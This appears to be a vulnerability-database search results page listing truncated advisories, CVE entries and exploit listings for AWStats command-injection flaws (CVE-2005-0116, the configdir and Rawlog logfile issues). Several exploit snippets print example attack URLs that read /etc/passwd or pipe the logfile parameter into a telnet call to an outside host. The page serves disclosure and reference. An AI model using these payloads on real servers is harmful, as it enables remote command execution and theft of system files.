659 matches found
CVE-2005-0116
AWStats 6.1, and other versions before 6.3, allows remote attackers to execute arbitrary commands via shell metacharacters in the configdir parameter to aswtats.pl...
CVE-2005-0116
AWStats 6.1, and other versions before 6.3, allows remote attackers to execute arbitrary commands via shell metacharacters in the configdir parameter to aswtats.pl...
DEBIAN-CVE-2005-0116
AWStats 6.1, and other versions before 6.3, allows remote attackers to execute arbitrary commands via shell metacharacters in the configdir parameter to aswtats.pl...
[Full-Disclosure] iDEFENSE Security Advisory 01.17.05: AWStats Remote Command Execution Vulnerability
AWStats Remote Command Execution Vulnerability iDEFENSE Security Advisory 01.17.05 www.idefense.com/application/poi/display?id=185&type=vulnerabilities January 17, 2005 I. BACKGROUND AWStats is a free tool that generates advanced web, ftp or mail server statistics, graphically. More information...
AWStats awstats.pl configdir Parameter Arbitrary Command Execution
The remote host is running AWStats, a free logfile analysis tool for analyzing ftp, mail, web, ... traffic. The remote version of this software fails to sanitize user-supplied input to the 'configdir' parameter of the 'awstats.pl' script. An attacker may exploit this condition to execute commands...
AWStats < 6.3 awstats.pl configdir Parameter Remote Command Execution
Binary data 2534.prm...
AWStats 6.2 6.1 - configdir Command Injection (Metasploit)
AWStats 6.2 6.1 - configdir Command Injection Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
AWStats 6.2-6.1 configdir Command Injection
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'AWStats...
awstats -- remote command execution vulnerability
An iDEFENSE Security Advisory reports: Remote exploitation of an input validation vulnerability in AWStats allows attackers to execute arbitrary commands under the privileges of the web server. The problem specifically exists when the application is running as a CGI script on a web server. The...
AWStats rawlog.pm logfile Parameter Arbitrary Command Execution
The remote host is running AWStats, a free real-time logfile analyzer. The AWStats Rawlog Plugin which is installed is prone to an input validation vulnerability. The issue exists in the 'logfile' URI data passwed to the 'awstats.pl' script. An attacker may exploit this to execute commands remote...
AWStats 5.0 6.3 - logfile File Inclusion Command Execution
AWStats 5.0 6.3 - logfile File Inclusion Command Execution Example: http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd...
AWStats Input Validation Hole in 'logfile'
Exploit for cgi platform in category dos / poc ========================================== AWStats Input Validation Hole in 'logfile' ========================================== Example:...
AWStats Input Validation Hole in 'logfile'
No description provided by source. Example: http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd...
AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution
Example: http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet milw0rm.co...
AWStats Rawlog Plugin Logfile Parameter Arbitrary Command Execution
Binary data 1728.prm...
AWStats < 6.6 migrate Variable Command Execution
Binary data 3536.prm...
Awstats Web Statistics Server Detection
Binary data 2504.prm...
AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
Description AWStats Rawlog Plugin is reported prone to an input validation vulnerability. The issue is reported to exist because user supplied 'logfile' URI data passed to the 'awstats.pl' script is not sanitized. An attacker may exploit this condition to execute commands remotely or disclose...